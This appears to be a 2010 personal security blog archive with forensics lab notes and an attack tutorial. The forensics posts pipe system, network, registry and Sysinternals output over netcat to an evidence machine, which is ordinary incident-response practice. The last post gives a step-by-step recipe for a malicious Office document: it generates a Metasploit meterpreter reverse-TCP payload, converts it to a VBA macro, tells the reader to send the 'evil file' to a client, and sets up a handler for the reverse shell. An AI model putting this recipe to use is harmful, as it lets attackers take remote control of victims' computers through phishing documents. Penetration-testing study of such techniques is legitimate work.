Monday, July 26, 2010

My Personal Blog Moved!

Dear All,

As of today. My personal blog has been moved to
New posts will be updated soonest possible.

Thursday, June 24, 2010

Covert Analysis II (Forensics)

On LON-WEB1, open the Event Viewer mmc snap-in, select System Event then select Save Logfile As, save the system event with another name:
Example: C:\Backup\SysEvent-Backup.evt

from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:

nc -v 99 < C:\Backup\SysEvent-Backup.evt

from CHFI-XP2 machine, receive the file:

nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt

To analyze:

On CHFI-XP2, open Event Viewer and load the file to view the events.

Overt Analysis (Forensics)

Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).

Launch the mmc with runas:

C:\>runas /user:LON-WEB1\administrator "mmc"

Once mmc has been launch, connect to the evidence machine.

Forensics Acquisition Utility (FAU)

Covert Analysis I (Forensics)

On CHFI-XP2, launch Netcat in Listening Mode:

C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt

On LON-WEB1, launch Netcat in Client Mode:

D:\Forensics\Netcat>date /t | nc 99 -w10
D:\Forensics\Netcat>time /t | nc 99 -w10

D:\Forensics\Netcat>ipconfig /all | nc 99 -w10
D:\Forensics\Netcat>netstat -an | nc 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 99 -w10
D:\Forensics\Netcat>arp -a | nc 99 -w10
D:\Forensics\Netcat>route print | nc 99 -w10
D:\Forensics\Netcat>tasklist | nc 99 -w10

Display registry values:

D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 99 -w10

If you need to launch Netcat from different directory,
access it by using this command:

D:\Forensics\>cd Sysinternalssuite

D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 99 -w10

MyEvidence.txt is the file which will store the evidence collection.

Forensics Useful Links

Tuesday, May 18, 2010

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.

Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST
msf > set LPORT 443
msf > exploit